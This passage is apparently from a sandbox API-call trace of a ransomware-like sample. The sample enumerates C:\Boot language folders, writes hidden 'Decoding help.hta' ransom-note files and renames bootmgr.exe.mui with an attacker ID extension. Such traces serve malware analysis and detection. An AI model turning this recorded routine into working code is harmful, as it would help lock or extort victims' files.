help.hta", dwFileAttributes=0x1) returned 1 [0041.271] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.271] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.271] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\ko-KR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\*.*") returned="\\\\?\\C:\\Boot\\ko-KR\\*.*" [0041.271] lstrlenW (lpString="\\\\?\\C:\\Boot\\ko-KR\\*.*") returned 21 [0041.271] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ko-KR\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" [0041.272] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" [0041.272] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.272] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0x7dcfd30 | out: lpFindFileData=0x7dcfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.272] FindClose (in: hFindFile=0x5a6070 | out: hFindFile=0x5a6070) returned 1 Thread: id = 79 os_tid = 0xb70 [0039.570] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*.*", lpFindFileData=0x7f0fd30 | out: lpFindFileData=0x7f0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d10 [0040.571] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.571] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x7f0fd30 | out: lpFindFileData=0x7f0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.571] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.571] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.571] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x7f0fd30 | out: lpFindFileData=0x7f0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.573] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Boot\\nb-NO\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\*.*") returned="\\\\?\\C:\\Boot\\nb-NO\\*.*" [0040.573] lstrlenW (lpString="\\\\?\\C:\\Boot\\nb-NO\\*.*") returned 21 [0040.573] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nb-NO\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\nb-NO\\Decoding help.hta" [0040.573] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\Decoding help.hta" (normalized: "c:\\boot\\nb-no\\decoding help.hta")) returned 0xffffffff [0040.573] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\Decoding help.hta" (normalized: "c:\\boot\\nb-no\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.818] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x7f0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x7f0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.818] CloseHandle (hObject=0x33c) returned 1 [0040.819] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.274] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.274] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.274] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\nb-NO\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\*.*") returned="\\\\?\\C:\\Boot\\nb-NO\\*.*" [0041.274] lstrlenW (lpString="\\\\?\\C:\\Boot\\nb-NO\\*.*") returned 21 [0041.274] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nb-NO\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" [0041.274] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" [0041.274] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.274] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.274] FindNextFileW (in: hFindFile=0x5d7d10, lpFindFileData=0x7f0fd30 | out: lpFindFileData=0x7f0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.274] FindClose (in: hFindFile=0x5d7d10 | out: hFindFile=0x5d7d10) returned 1 Thread: id = 80 os_tid = 0xb74 [0039.580] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*.*", lpFindFileData=0x804fd30 | out: lpFindFileData=0x804fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a6030 [0040.558] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.558] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x804fd30 | out: lpFindFileData=0x804fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.558] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.558] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.558] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x804fd30 | out: lpFindFileData=0x804fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.559] lstrcpyW (in: lpString1=0x5cf8530, lpString2="\\\\?\\C:\\Boot\\nl-NL\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\*.*") returned="\\\\?\\C:\\Boot\\nl-NL\\*.*" [0040.559] lstrlenW (lpString="\\\\?\\C:\\Boot\\nl-NL\\*.*") returned 21 [0040.559] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nl-NL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\nl-NL\\Decoding help.hta" [0040.559] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\Decoding help.hta" (normalized: "c:\\boot\\nl-nl\\decoding help.hta")) returned 0xffffffff [0040.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\Decoding help.hta" (normalized: "c:\\boot\\nl-nl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.809] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x804fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x804fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.810] CloseHandle (hObject=0x33c) returned 1 [0040.810] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.271] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.271] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.271] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\nl-NL\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\*.*") returned="\\\\?\\C:\\Boot\\nl-NL\\*.*" [0041.271] lstrlenW (lpString="\\\\?\\C:\\Boot\\nl-NL\\*.*") returned 21 [0041.271] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nl-NL\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" [0041.271] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" [0041.271] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.271] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x804fd30 | out: lpFindFileData=0x804fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.271] FindClose (in: hFindFile=0x5a6030 | out: hFindFile=0x5a6030) returned 1 Thread: id = 81 os_tid = 0xb78 [0039.581] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*.*", lpFindFileData=0x818fd30 | out: lpFindFileData=0x818fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a60b0 [0040.567] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.567] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x818fd30 | out: lpFindFileData=0x818fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.568] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.568] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.568] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x818fd30 | out: lpFindFileData=0x818fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.568] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Boot\\pl-PL\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\*.*") returned="\\\\?\\C:\\Boot\\pl-PL\\*.*" [0040.568] lstrlenW (lpString="\\\\?\\C:\\Boot\\pl-PL\\*.*") returned 21 [0040.568] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pl-PL\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\pl-PL\\Decoding help.hta" [0040.568] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\Decoding help.hta" (normalized: "c:\\boot\\pl-pl\\decoding help.hta")) returned 0xffffffff [0040.568] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\Decoding help.hta" (normalized: "c:\\boot\\pl-pl\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.812] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x818fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x818fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.813] CloseHandle (hObject=0x33c) returned 1 [0040.813] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.272] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.272] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.272] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\pl-PL\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\*.*") returned="\\\\?\\C:\\Boot\\pl-PL\\*.*" [0041.272] lstrlenW (lpString="\\\\?\\C:\\Boot\\pl-PL\\*.*") returned 21 [0041.272] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pl-PL\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" [0041.272] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" [0041.272] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.272] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.272] FindNextFileW (in: hFindFile=0x5a60b0, lpFindFileData=0x818fd30 | out: lpFindFileData=0x818fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.272] FindClose (in: hFindFile=0x5a60b0 | out: hFindFile=0x5a60b0) returned 1 Thread: id = 82 os_tid = 0xb7c [0039.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*.*", lpFindFileData=0x82cfd30 | out: lpFindFileData=0x82cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7cd0 [0040.570] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.570] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x82cfd30 | out: lpFindFileData=0x82cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.570] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.570] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.570] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x82cfd30 | out: lpFindFileData=0x82cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0040.570] lstrcpyW (in: lpString1=0x10968810, lpString2="\\\\?\\C:\\Boot\\pt-BR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\*.*") returned="\\\\?\\C:\\Boot\\pt-BR\\*.*" [0040.570] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-BR\\*.*") returned 21 [0040.570] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-BR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\pt-BR\\Decoding help.hta" [0040.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\Decoding help.hta" (normalized: "c:\\boot\\pt-br\\decoding help.hta")) returned 0xffffffff [0040.570] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\Decoding help.hta" (normalized: "c:\\boot\\pt-br\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.816] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x82cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x82cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.817] CloseHandle (hObject=0x33c) returned 1 [0040.817] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.273] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0041.273] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0041.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\pt-BR\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\*.*") returned="\\\\?\\C:\\Boot\\pt-BR\\*.*" [0041.273] lstrlenW (lpString="\\\\?\\C:\\Boot\\pt-BR\\*.*") returned 21 [0041.273] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-BR\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" [0041.273] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" [0041.273] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.274] FindNextFileW (in: hFindFile=0x5d7cd0, lpFindFileData=0x82cfd30 | out: lpFindFileData=0x82cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0041.274] FindClose (in: hFindFile=0x5d7cd0 | out: hFindFile=0x5d7cd0) returned 1 Thread: id = 83 os_tid = 0xb80 [0039.594] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*.*", lpFindFileData=0x840fd30 | out: lpFindFileData=0x840fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d50 [0040.574] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.574] FindNextFileW (in: hFindFile=0x5d7d50, lpFindFileData=0x840fd30 | out: lpFindFileData=0x840fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, 